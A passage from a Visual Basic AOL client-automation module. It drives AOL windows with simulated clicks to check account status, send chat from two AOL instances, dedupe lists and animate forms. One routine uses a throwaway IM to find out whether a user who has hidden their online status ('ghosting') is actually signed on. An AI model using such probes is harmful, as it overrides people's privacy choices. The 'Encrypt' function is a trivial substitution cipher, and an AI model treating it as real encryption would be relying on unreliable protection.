  1311. pcIcon& = FindWindowEx(pcWin&, 0&, "_AOL_Icon", vbNullString)
  1312. Loop Until pcWin& <> 0& And pcIcon& <> 0&
  1313.  
  1314. Call RunMenuByString("incoming text")
  1315.  
  1316. Call SendMessage(pcIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1317. Call SendMessage(pcIcon&, WM_LBUTTONUP, 0&, 0&)
  1318.  
  1319. Do
  1320. DoEvents
  1321. mstrWin& = FindWindow("_AOL_Modal", "Parental Controls")
  1322. mstrIcon& = FindWindowEx(mstrWin&, 0&, "_AOL_Icon", vbNullString)
  1323. mstrIcon& = FindWindowEx(mstrWin&, mstrIcon&, "_AOL_Icon", vbNullString)
  1324. mstrIcon& = FindWindowEx(mstrWin&, mstrIcon&, "_AOL_Icon", vbNullString)
  1325.  
  1326. subwin& = FindWindow("_AOL_Modal", "")
  1327. subIcon& = FindWindowEx(subwin&, 0&, "_AOL_Icon", vbNullString)
  1328. Loop Until mstrWin& <> 0& And mstrIcon& <> 0& Or subwin& <> 0& And subIcon& <> 0&
  1329.  
  1330. If mstrWin& <> 0& Then
  1331. Call SendMessage(mstrIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1332. Call SendMessage(mstrIcon&, WM_LBUTTONUP, 0&, 0&)
  1333. Call PostMessage(pcWin&, WM_CLOSE, 0&, 0&)
  1334. CheckIfMaster = True
  1335. Else
  1336. Call SendMessage(subIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1337. Call SendMessage(subIcon&, WM_LBUTTONUP, 0&, 0&)
  1338. Call PostMessage(pcWin&, WM_CLOSE, 0&, 0&)
  1339. CheckIfMaster = False
  1340. End If
  1341. End Function
  1342.  
  1343. Public Function CheckIfOh() As Boolean
  1344. 'checks if user account is an overhead
  1345. Dim aol As Long, mdi As Long, msgWin As Long, msgBut As Long, sWin As Long
  1346.  
  1347. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  1348. CheckIfOh = CheckIfOh25
  1349. Exit Function
  1350. End If
  1351.  
  1352. aol& = FindWindow("AOL Frame25", vbNullString)
  1353. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1354.  
  1355. Call ImsOff
  1356.  
  1357. pause (0.2)
  1358.  
  1359. Call sendim(GetUser$, "oh check")
  1360.  
  1361. Do
  1362. DoEvents
  1363. msgWin& = FindWindow("#32770", "America Online")
  1364. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  1365.  
  1366. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  1367. Loop Until msgWin& <> 0& And msgBut& <> 0& Or sWin& = 0&
  1368.  
  1369. If msgWin& <> 0& Then
  1370. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1371. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  1372. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  1373. CheckIfOh = False
  1374. ElseIf sWin& = 0& Then
  1375. CheckIfOh = True
  1376. End If
  1377.  
  1378. 'Pause (0.2)
  1379.  
  1380. 'Call IMsOn
  1381. End Function
  1382.  
  1383. Public Function CheckIfOh25() As Boolean
  1384. 'checks if user's account is overhead on 2.5 / 3.0
  1385. Dim aol As Long, mdi As Long, msgWin As Long, msgBut As Long, sWin As Long
  1386. Dim modWin As Long, modBut As Long
  1387.  
  1388. aol& = FindWindow("AOL Frame25", vbNullString)
  1389. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1390.  
  1391. Call IMsOff25
  1392.  
  1393. pause (0.1)
  1394.  
  1395. Call SendIM25(GetUser$, "oh check")
  1396.  
  1397. Do
  1398. DoEvents
  1399. msgWin& = FindWindow("#32770", "America Online")
  1400. msgBut& = FindWindowEx(msgWin&, 0&, "Button", "OK")
  1401.  
  1402. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  1403.  
  1404. modWin& = FindWindow("_AOL_Modal", vbNullString)
  1405. modBut& = FindWindowEx(modWin&, 0&, "_AOL_Button", "OK")
  1406. Loop Until msgWin& <> 0& And msgBut& <> 0& Or sWin& = 0& Or modWin& <> 0& And modBut& <> 0&
  1407.  
  1408. If msgWin& <> 0& Then
  1409. Call PostMessage(msgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1410. Call PostMessage(msgBut&, WM_KEYUP, VK_SPACE, 0&)
  1411.  
  1412. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  1413.  
  1414. CheckIfOh25 = False
  1415. ElseIf sWin& = 0& Then
  1416. CheckIfOh25 = True
  1417. ElseIf modWin& <> 0& Then
  1418. Call PostMessage(modBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1419. Call PostMessage(modBut&, WM_KEYUP, VK_SPACE, 0&)
  1420. End If
  1421.  
  1422. pause (0.3)
  1423.  
  1424. 'Call IMsOn25
  1425. End Function
  1426.  
  1427. Public Function CheckIMs(screenname As String) As Boolean
  1428. 'checks the ims of a screen name
  1429. 'if his im's are off or he's ghosting,
  1430. 'then checkims = false
  1431. 'if he can be im'd, then checkims = true
  1432. Dim aol As Long, mdi As Long
  1433. Dim IMWin As Long, imEdit As Long, imCNTL As Long, imicon As Long, imLong As Long
  1434. Dim ciWin As Long, ciBut As Long, ciStatic As Long, ciString As String
  1435.  
  1436. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  1437. CheckIMs = CheckIMs25(screenname$)
  1438. Exit Function
  1439. End If
  1440.  
  1441. aol& = FindWindow("AOL Frame25", vbNullString)
  1442. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1443.  
  1444. Call Keyword("aol://9293:" + screenname$)
  1445.  
  1446. Do
  1447. DoEvents
  1448. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  1449. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  1450. imCNTL& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  1451. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  1452. For imLong& = 1 To 9
  1453. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  1454. Next imLong&
  1455. Loop Until IMWin& <> 0& And imEdit& <> 0& And imCNTL& <> 0& And imicon& <> 0&
  1456.  
  1457. pause (0.2)
  1458.  
  1459. imicon& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  1460. For imLong& = 1 To 9
  1461. imicon& = FindWindowEx(IMWin&, imicon&, "_AOL_Icon", vbNullString)
  1462. Next imLong&
  1463.  
  1464. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, screenname$)
  1465. Call SendMessageByString(imCNTL&, WM_SETTEXT, 0&, "im check")
  1466.  
  1467. Call SendMessage(imicon&, WM_LBUTTONDOWN, 0&, 0&)
  1468. Call SendMessage(imicon&, WM_LBUTTONUP, 0&, 0&)
  1469.  
  1470. Do
  1471. DoEvents
  1472. ciWin& = FindWindow("#32770", "America Online")
  1473. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  1474. ciStatic& = FindWindowEx(ciWin&, 0&, "Static", vbNullString)
  1475. ciStatic& = FindWindowEx(ciWin&, ciStatic&, "Static", vbNullString)
  1476. ciString$ = GetText(ciStatic&)
  1477. Loop Until ciWin& <> 0& And ciBut& <> 0& And ciStatic& <> 0& And ciString$ <> ""
  1478.  
  1479. If InStr(1, ciString$, "not currently signed on") <> 0& Then
  1480. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1481. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  1482. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  1483. CheckIMs = False
  1484. ElseIf InStr(1, ciString$, "is online and able to receive Instant Messages") <> 0& Then
  1485. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1486. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  1487. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  1488. CheckIMs = True
  1489. ElseIf InStr(1, ciString$, "cannot currently receive Instant Messages") <> 0& Then
  1490. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1491. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  1492. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  1493. CheckIMs = False
  1494. End If
  1495. End Function
  1496.  
  1497. Public Function CheckIMs25(screenname As String) As Boolean
  1498. 'checks the ims of a screen name
  1499. 'if his im's are off or he's ghosting,
  1500. 'then checkims = false
  1501. 'if he can be im'd, then checkims = true
  1502. Dim aol As Long, mdi As Long
  1503. Dim IMWin As Long, imEdit As Long, imEdit2 As Long, IMButton As Long, imLong As Long
  1504. Dim ciWin As Long, ciBut As Long, ciStatic As Long, ciString As String
  1505.  
  1506. aol& = FindWindow("AOL Frame25", vbNullString)
  1507. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1508.  
  1509. 'Call KeyWord25("aol://9293:" + ScreenName$)
  1510. Call RunMenuByString("send an instant message")
  1511.  
  1512. Do
  1513. DoEvents
  1514. IMWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Send Instant Message")
  1515. imEdit& = FindWindowEx(IMWin&, 0&, "_AOL_Edit", vbNullString)
  1516. If AOLVersion = "2.5" Then
  1517. imEdit2& = FindWindowEx(IMWin&, imEdit&, "_AOL_Edit", vbNullString)
  1518. Else
  1519. imEdit2& = FindWindowEx(IMWin&, 0&, "RICHCNTL", vbNullString)
  1520. End If
  1521. If AOLVersion = "2.5" Then
  1522. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Button", "Available?")
  1523. Else
  1524. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  1525. For imLong& = 1 To 9
  1526. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  1527. Next imLong&
  1528. End If
  1529. Loop Until IMButton& <> 0& And imEdit& <> 0& And imEdit2& <> 0& And IMButton& <> 0&
  1530.  
  1531. If AOLVersion = "3" Then
  1532. pause (0.1)
  1533.  
  1534. IMButton& = FindWindowEx(IMWin&, 0&, "_AOL_Icon", vbNullString)
  1535. For imLong& = 1 To 9
  1536. IMButton& = FindWindowEx(IMWin&, IMButton&, "_AOL_Icon", vbNullString)
  1537. Next imLong&
  1538. End If
  1539.  
  1540. Call SendMessageByString(imEdit&, WM_SETTEXT, 0&, screenname$)
  1541. Call SendMessageByString(imEdit2&, WM_SETTEXT, 0&, "im check")
  1542.  
  1543. If AOLVersion = "3" Then
  1544. Call SendMessage(IMButton&, WM_LBUTTONDOWN, 0&, 0&)
  1545. Call SendMessage(IMButton&, WM_LBUTTONUP, 0&, 0&)
  1546. Else
  1547. Call SendMessage(IMButton&, WM_KEYDOWN, VK_SPACE, 0&)
  1548. Call SendMessage(IMButton&, WM_KEYUP, VK_SPACE, 0&)
  1549. End If
  1550.  
  1551. Do
  1552. DoEvents
  1553. ciWin& = FindWindow("#32770", "America Online")
  1554. ciBut& = FindWindowEx(ciWin&, 0&, "Button", "OK")
  1555. ciStatic& = FindWindowEx(ciWin&, 0&, "Static", vbNullString)
  1556. ciStatic& = FindWindowEx(ciWin&, ciStatic&, "Static", vbNullString)
  1557. ciString$ = GetText(ciStatic&)
  1558. Loop Until ciWin& <> 0& And ciBut& <> 0& And ciStatic& <> 0& And ciString$ <> ""
  1559.  
  1560. Call PostMessage(ciBut&, WM_KEYDOWN, VK_SPACE, 0&)
  1561. Call PostMessage(ciBut&, WM_KEYUP, VK_SPACE, 0&)
  1562. Call PostMessage(IMWin&, WM_CLOSE, 0&, 0&)
  1563.  
  1564. If InStr(1, ciString$, "not currently signed on") <> 0& Then
  1565. CheckIMs25 = False
  1566. ElseIf InStr(1, ciString$, "is online and able to receive Instant Messages") <> 0& Then
  1567. CheckIMs25 = True
  1568. ElseIf InStr(1, ciString$, "cannot currently receive Instant Messages") <> 0& Then
  1569. CheckIMs25 = False
  1570. End If
  1571. End Function
  1572.  
  1573. Public Sub ClearChat()
  1574. 'clears aol's chat text window
  1575. Dim rWin As Long, rCNTL As Long, rText As String, rString As String
  1576.  
  1577. rWin& = FindRoom&
  1578. If rWin& = 0& Then Exit Sub
  1579.  
  1580. rCNTL& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  1581. Call SendMessageByString(rCNTL&, WM_SETTEXT, 0&, "")
  1582. End Sub
  1583.  
  1584. Public Sub ClearChat25()
  1585. 'clears aol's chat text window
  1586. Dim rWin As Long, rView As Long, rText As String, rString As String
  1587.  
  1588. rWin& = FindRoom25&
  1589. If rWin& = 0& Then Exit Sub
  1590.  
  1591. rView& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  1592. Call SendMessageByString(rView&, WM_SETTEXT, 0&, "")
  1593. End Sub
  1594.  
  1595. Public Sub clone_About()
  1596. 'the "Clone" subs are made
  1597. 'for aol 4.0 and aol 2.5
  1598. 'they does not 'clone' aol,
  1599. 'but aol WILL let you load
  1600. '4.0 and 2.5 at the same time
  1601. '[load 4.0 first, then load 2.5]
  1602. '
  1603. 'all the clone_ subs w/ '25' at the
  1604. 'end of them are for aol 2.5
  1605. '
  1606. 'and all the other clone_ subs
  1607. 'are made for aol 4.0
  1608. '
  1609. 'i hope that explains it
  1610. '
  1611. 'example:
  1612. 'Call clone_chatsend("what's up?") 'sends on 4.0
  1613. 'call clone_chatsend("not much") 'sends on 2.5
  1614. '
  1615. 'you HAVE to have aol 4.0 AND 2.5
  1616. 'loaded for this to work!
  1617. End Sub
  1618.  
  1619. Public Sub clone_ChatSend(Text As String)
  1620. 'sends text to aol 4.0
  1621. Dim rWin As Long, rRich As Long, rText As String
  1622. Dim WaitSend As String
  1623.  
  1624. If FindRoom& = 0& Or Text$ = "" Then Exit Sub
  1625.  
  1626. rWin& = clone_FindRoom&
  1627. rRich& = FindWindowEx(rWin&, 0&, "RICHCNTL", vbNullString)
  1628. rRich& = FindWindowEx(rWin&, rRich&, "RICHCNTL", vbNullString)
  1629. rText$ = GetText(rRich&)
  1630. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, "")
  1631. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, Text$)
  1632. Do
  1633. DoEvents
  1634. Call SendMessageLong(rRich&, WM_CHAR, ENTER_KEY, 0&)
  1635. WaitSend$ = GetText(rRich&)
  1636. Loop Until WaitSend$ = ""
  1637. Call SendMessageByString(rRich&, WM_SETTEXT, 0&, rText$)
  1638. End Sub
  1639.  
  1640. Public Sub Clone_ChatSend25(Text As String)
  1641. 'sends text to aol 2.5
  1642. Dim rWin As Long, rString As String, rEdit As Long
  1643.  
  1644. rWin& = Clone_FindRoom25
  1645. If rWin& = 0& Or Text$ = "" Then Exit Sub
  1646.  
  1647. rEdit& = FindWindowEx(rWin&, 0&, "_AOL_Edit", vbNullString)
  1648.  
  1649. rString$ = GetText(rEdit&)
  1650.  
  1651. Call SendMessageByString(rEdit&, WM_SETTEXT, 0&, Text$)
  1652.  
  1653. Call SendMessageLong(rEdit&, WM_CHAR, ENTER_KEY, 0&)
  1654. Call SendMessageByString(rEdit&, WM_SETTEXT, 0&, rString$)
  1655.  
  1656. End Sub
  1657.  
  1658. Public Function clone_FindRoom() As Long
  1659. 'finds room on aol 4.0
  1660. Dim aol As Long, mdi As Long, cWin As Long, cRich As Long
  1661. Dim cList As Long, cIcon As Long, cCombo As Long
  1662.  
  1663. aol& = FindAOL4
  1664. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1665. cWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  1666. cRich& = FindWindowEx(cWin&, 0&, "RICHCNTL", vbNullString)
  1667. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  1668. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  1669. cCombo& = FindWindowEx(cWin&, 0&, "_AOL_Combobox", vbNullString)
  1670.  
  1671. If cRich& <> 0& And cList& <> 0& And cIcon& <> 0& And cCombo& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  1672. clone_FindRoom& = cWin&
  1673. Exit Function
  1674. Else
  1675.  
  1676. Do
  1677. cWin& = FindWindowEx(mdi&, cWin&, "AOL Child", vbNullString)
  1678. cRich& = FindWindowEx(cWin&, 0&, "RICHCNTL", vbNullString)
  1679. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  1680. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  1681. cCombo& = FindWindowEx(cWin&, 0&, "_AOL_Combobox", vbNullString)
  1682. If cRich& <> 0& And cList& <> 0& And cIcon& <> 0& And cCombo& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  1683. clone_FindRoom& = cWin&
  1684. Exit Function
  1685. End If
  1686. Loop Until cWin& = 0&
  1687.  
  1688. End If
  1689. clone_FindRoom& = cWin&
  1690. End Function
  1691.  
  1692. Public Function Clone_FindRoom25() As Long
  1693. 'finds room on aol 2.5
  1694. Dim aol As Long, mdi As Long, cWin As Long, cView As Long
  1695. Dim cList As Long, cIcon As Long
  1696.  
  1697. aol& = FindAOL25
  1698. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1699. cWin& = FindWindowEx(mdi&, 0&, "AOL Child", vbNullString)
  1700. cView& = FindWindowEx(cWin&, 0&, "_AOL_View", vbNullString)
  1701. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  1702. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  1703.  
  1704. If cView& <> 0& And cList& <> 0& And cIcon& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  1705. Clone_FindRoom25& = cWin&
  1706. Exit Function
  1707. Else
  1708.  
  1709. Do
  1710. cWin& = FindWindowEx(mdi&, cWin&, "AOL Child", vbNullString)
  1711. cView& = FindWindowEx(cWin&, 0&, "_AOL_View", vbNullString)
  1712. cList& = FindWindowEx(cWin&, 0&, "_AOL_Listbox", vbNullString)
  1713. cIcon& = FindWindowEx(cWin&, 0&, "_AOL_Icon", vbNullString)
  1714. If cView& <> 0& And cList& <> 0& And cIcon& <> 0& And GetText(cWin&) <> "AOL Hotline" Then
  1715. Clone_FindRoom25& = cWin&
  1716. Exit Function
  1717. End If
  1718. Loop Until cWin& = 0&
  1719.  
  1720. End If
  1721. Clone_FindRoom25& = cWin&
  1722. End Function
  1723.  
  1724. Public Sub CloseAddBuddy()
  1725. 'closes the addbuddy window on your buddylist
  1726. Dim aol As Long, mdi As Long
  1727. Dim eblWin As Long, eIcon As Long
  1728. Dim nowin As Long, nobut As Long
  1729.  
  1730. pause (0.2)
  1731.  
  1732. aol& = FindWindow("AOL Frame25", vbNullString)
  1733. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1734.  
  1735. eblWin& = FindEditBuddyList
  1736.  
  1737. eIcon& = FindWindowEx(eblWin&, 0&, "_AOL_Icon", vbNullString)
  1738. eIcon& = FindWindowEx(eblWin&, eIcon&, "_AOL_Icon", vbNullString)
  1739. eIcon& = FindWindowEx(eblWin&, eIcon&, "_AOL_Icon", vbNullString)
  1740.  
  1741. Call SendMessage(eIcon&, WM_LBUTTONDOWN, 0&, 0&)
  1742. Call SendMessage(eIcon&, WM_LBUTTONUP, 0&, 0&)
  1743.  
  1744. Do
  1745. DoEvents
  1746. nowin& = FindWindow("#32770", "America Online")
  1747. nobut& = FindWindowEx(nowin&, 0&, "Button", "OK")
  1748. eblWin& = FindEditBuddyList
  1749. Loop Until nowin& <> 0& And nobut& <> 0& Or eblWin& = 0&
  1750.  
  1751. If eblWin& = 0& Then
  1752. pause (0.3)
  1753. nowin& = FindWindow("#32770", "America Online")
  1754. nobut& = FindWindowEx(nowin&, 0&, "Button", "OK")
  1755. End If
  1756.  
  1757. If nowin& <> 0& Then
  1758. Call PostMessage(nobut&, WM_KEYDOWN, VK_SPACE, 0&)
  1759. Call PostMessage(nobut&, WM_KEYUP, VK_SPACE, 0&)
  1760. End If
  1761.  
  1762. Call PostMessage(FindEditBuddyList, WM_CLOSE, 0&, 0&)
  1763. Call PostMessage(FindBuddyLists, WM_CLOSE, 0&, 0&)
  1764. End Sub
  1765.  
  1766. Public Sub CloseMail()
  1767. 'closes mail..
  1768. 'works well.
  1769. Dim aol As Long, mdi As Long
  1770. Dim mWin As Long, cWin As Long, cbut As Long
  1771.  
  1772. aol& = FindWindow("AOL Frame25", vbNullString)
  1773. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  1774.  
  1775. mWin& = FindMail&
  1776. Call PostMessage(mWin&, WM_CLOSE, 0&, 0&)
  1777.  
  1778. Do
  1779. DoEvents
  1780. mWin& = FindMail&
  1781. cWin& = FindWindow("#32770", "America Online")
  1782. cbut& = FindWindowEx(cWin&, 0&, "Button", "&No")
  1783. Loop Until mWin& = 0& Or cWin& <> 0& And cbut& <> 0&
  1784.  
  1785. If cWin& <> 0& Then
  1786. Call PostMessage(cbut&, WM_KEYDOWN, VK_SPACE, 0&)
  1787. Call PostMessage(cbut&, WM_KEYUP, VK_SPACE, 0&)
  1788. End If
  1789. End Sub
  1790.  
  1791. Public Function DupeKill(list As ListBox) As Long
  1792. 'dupekills a listbox
  1793. 'this code was written entirely by me
  1794.  
  1795. 'the dupekill sub is a function
  1796. 'it returns the value of the number
  1797. 'of dupes killed.
  1798.  
  1799. 'example:
  1800.  
  1801. 'lngDupe& = DupeKill(List1)
  1802. 'Call MsgBox("" & lngDupe& & " dupes were killed.", vbInformation + vbOKOnly, "Dupe Kill")
  1803. Dim Amount As Long, Y As Long, X As Long
  1804.  
  1805. For Y = 0 To list.ListCount
  1806. For X = Y + 1 To list.ListCount '- Y + 1
  1807. If list.list(X) = list.list(Y) Then
  1808. list.RemoveItem (X)
  1809. Amount = Amount + 1
  1810. X = X - 1
  1811. End If
  1812. Next X
  1813. Next Y
  1814.  
  1815. DupeKill = Amount
  1816. End Function
  1817.  
  1818. Public Function DupeKill2Lists(ListA As ListBox, ListB As ListBox) As Long
  1819. 'dupekills two listboxes
  1820. 'this code was also written entirely by me
  1821.  
  1822. 'the dupekill2lists sub is a function
  1823. 'it returns the value of the number
  1824. 'of dupes killed.
  1825.  
  1826. 'example:
  1827.  
  1828. 'lngDupe& = DupeKill2Lists(List1, List2)
  1829. 'Call MsgBox("" & lngDupe& & " dupes were killed.", vbInformation + vbOKOnly, "Dupe Killing 2 Lists")
  1830.  
  1831. Dim Amount As Long, Y As Long, X As Long
  1832.  
  1833. For Y = 0 To ListA.ListCount
  1834. For X = Y + 1 To ListA.ListCount '- Y + 1
  1835. If ListA.list(X) = ListA.list(Y) Then
  1836. If ListB.list(Y) = ListB.list(X) Then
  1837. ListA.RemoveItem (X)
  1838. ListB.RemoveItem (X)
  1839. Amount& = Amount& + 1
  1840. X = X - 1
  1841. End If
  1842. End If
  1843. Next X
  1844. Next Y
  1845.  
  1846. DupeKill2Lists = Amount&
  1847. End Function
  1848.  
  1849. Public Function DupeKillCombo(Combo As ComboBox) As Long
  1850. 'dupekills a combo
  1851. 'this code was written entirely by me
  1852.  
  1853. 'the dupekill sub is a function
  1854. 'it returns the value of the number
  1855. 'of dupes killed.
  1856.  
  1857. 'example:
  1858.  
  1859. 'lngDupe& = DupeKillCombo(Combo1)
  1860. 'Call MsgBox("" & lngDupe& & " dupes were killed.", vbInformation + vbOKOnly, "Dupe Kill")
  1861. Dim Amount As Long, Y As Long, X As Long
  1862.  
  1863.  
  1864. For Y = 0 To Combo.ListCount
  1865. For X = Y + 1 To Combo.ListCount
  1866. If Combo.list(X) = Combo.list(Y) Then
  1867. Combo.RemoveItem (X)
  1868. Amount = Amount + 1
  1869. X = X - 1
  1870. End If
  1871. Next X
  1872. Next Y
  1873.  
  1874. DupeKillCombo = Amount
  1875. End Function
  1876.  
  1877. Public Sub EliteLoad(frm As Form)
  1878. 'self explanatory
  1879. Dim MidScreen As Double
  1880. frm.Left = 1
  1881.  
  1882. MidScreen = (Screen.Width / 2) - (frm.Width / 2)
  1883.  
  1884. Do
  1885. DoEvents
  1886. frm.Left = frm.Left + ((MidScreen - frm.Left) / 10)
  1887. Loop Until frm.Left + 10 > MidScreen
  1888.  
  1889. frm.Left = (Screen.Width / 2) - (frm.Width / 2)
  1890. End Sub
  1891.  
  1892. Public Sub EliteUnload(frm As Form, Eliteness As Long)
  1893. 'this only works if the form:
  1894. 'has the 'control box' property set to false
  1895. 'and the form does *NOT* have a caption
  1896.  
  1897. 'the smaller the "eliteness" property...
  1898. 'the faster the form shrinks,
  1899. 'and vice versa.
  1900.  
  1901. Call FormCircle(frm, 25&)
  1902.  
  1903. frm.Refresh
  1904.  
  1905. Do
  1906. 'DoEvents
  1907. frm.Width = frm.Width - (frm.Width / Eliteness&)
  1908. frm.Left = frm.Left + ((frm.Width / Eliteness&) / 2&)
  1909. frm.Height = frm.Height - (frm.Height / Eliteness&)
  1910. frm.Top = frm.Top + ((frm.Height / Eliteness&) / 2&)
  1911. Loop Until frm.Height <= 120& Or frm.Width <= 120&
  1912.  
  1913. frm.Hide
  1914. End Sub
  1915.  
  1916. Public Sub EliteUnload2(frm As Form)
  1917. 'very similar to stolen acct2's unload..
  1918.  
  1919. Do
  1920. If frm.Left > 0& Then
  1921. frm.Left = frm.Left - 300&
  1922. End If
  1923.  
  1924. If frm.Top + frm.Height < Screen.Height Then
  1925. frm.Top = frm.Top + 300&
  1926. End If
  1927.  
  1928. If frm.Left < 0& Then frm.Left = 0&
  1929. If frm.Top + frm.Height > Screen.Height Then frm.Top = Screen.Height - frm.Height
  1930.  
  1931. Loop Until frm.Left = 0& And frm.Top + frm.Height = Screen.Height
  1932.  
  1933. Do
  1934. If frm.Top > 0& Then
  1935. frm.Top = frm.Top - 300&
  1936. End If
  1937.  
  1938. If frm.Top < 0& Then
  1939. frm.Top = 0&
  1940. End If
  1941. Loop Until frm.Top <= 0&
  1942.  
  1943. Do
  1944. If frm.Left + frm.Width <= Screen.Width Then
  1945. frm.Left = frm.Left + 500&
  1946. End If
  1947.  
  1948. If frm.Left + frm.Width > Screen.Width Then
  1949. frm.Left = Screen.Width + frm.Width
  1950. End If
  1951. Loop Until frm.Left >= Screen.Width
  1952.  
  1953. End Sub
  1954.  
  1955. Public Sub EliteUnload3(frm As Form)
  1956. 'self explanatory
  1957. Dim Distance As Long
  1958.  
  1959. Do
  1960. DoEvents
  1961. frm.Left = frm.Left + Distance
  1962. Distance& = Distance& + 5
  1963. Loop Until frm.Left > Screen.Width
  1964. End Sub
  1965.  
  1966. Public Function Encrypt(Text As String) As String
  1967. 'encrypts / decrypts text
  1968. 'you can use it back to back..
  1969. 'whatever it encrypts to, can also be used to decrypt
  1970. 'if you're confused, just try it out
  1971. Dim e As Long, eChr As String, eFull As String
  1972.  
  1973. Text$ = LCase(Text$)
  1974.  
  1975. For e = 1 To Len(Text$)
  1976. eChr$ = Mid(Text$, e, 1)
  1977. If eChr$ = "a" Then
  1978. eChr$ = "9"
  1979. ElseIf eChr$ = "b" Then
  1980. eChr$ = "0"
  1981. ElseIf eChr$ = "c" Then
  1982. eChr$ = "`"
  1983. ElseIf eChr$ = "d" Then
  1984. eChr$ = "~"
  1985. ElseIf eChr$ = "e" Then
  1986. eChr$ = "!"
  1987. ElseIf eChr$ = "f" Then
  1988. eChr$ = "@"
  1989. ElseIf eChr$ = "g" Then
  1990. eChr$ = "#"
  1991. ElseIf eChr$ = "h" Then
  1992. eChr$ = "$"
  1993. ElseIf eChr$ = "i" Then
  1994. eChr$ = "%"
  1995. ElseIf eChr$ = "j" Then
  1996. eChr$ = "^"
  1997. ElseIf eChr$ = "k" Then
  1998. eChr$ = "&"
  1999. ElseIf eChr$ = "l" Then
  2000. eChr$ = "*"
  2001. ElseIf eChr$ = "m" Then
  2002. eChr$ = "("
  2003. ElseIf eChr$ = "n" Then
  2004. eChr$ = ")"
  2005. ElseIf eChr$ = "o" Then
  2006. eChr$ = "."
  2007. ElseIf eChr$ = "p" Then
  2008. eChr$ = ","
  2009. ElseIf eChr$ = "q" Then
  2010. eChr$ = "?"
  2011. ElseIf eChr$ = "r" Then
  2012. eChr$ = "/"
  2013. ElseIf eChr$ = "s" Then
  2014. eChr$ = "<"
  2015. ElseIf eChr$ = "t" Then
  2016. eChr$ = ">"
  2017. ElseIf eChr$ = "u" Then
  2018. eChr$ = "_"
  2019. ElseIf eChr$ = "v" Then
  2020. eChr$ = "-"
  2021. ElseIf eChr$ = "w" Then
  2022. eChr$ = "="
  2023. ElseIf eChr$ = "x" Then
  2024. eChr$ = "+"
  2025. ElseIf eChr$ = "y" Then
  2026. eChr$ = "["
  2027. ElseIf eChr$ = "z" Then
  2028. eChr$ = "]"
  2029.  
  2030. ElseIf eChr$ = "1" Then
  2031. eChr$ = "{"
  2032. ElseIf eChr$ = "2" Then
  2033. eChr$ = "}"
  2034. ElseIf eChr$ = "3" Then
  2035. eChr$ = "\"
  2036. ElseIf eChr$ = "4" Then
  2037. eChr$ = "|"
  2038. ElseIf eChr$ = "5" Then
  2039. eChr$ = ";"
  2040. ElseIf eChr$ = "6" Then
  2041. eChr$ = ":"
  2042. ElseIf eChr$ = "7" Then
  2043. eChr$ = "'"
  2044. ElseIf eChr$ = "8" Then
  2045. eChr$ = "" + Chr(34)
  2046. ElseIf eChr$ = "9" Then
  2047. eChr$ = "a"
  2048. ElseIf eChr$ = "0" Then
  2049. eChr$ = "b"
  2050.  
  2051. ElseIf eChr$ = "`" Then
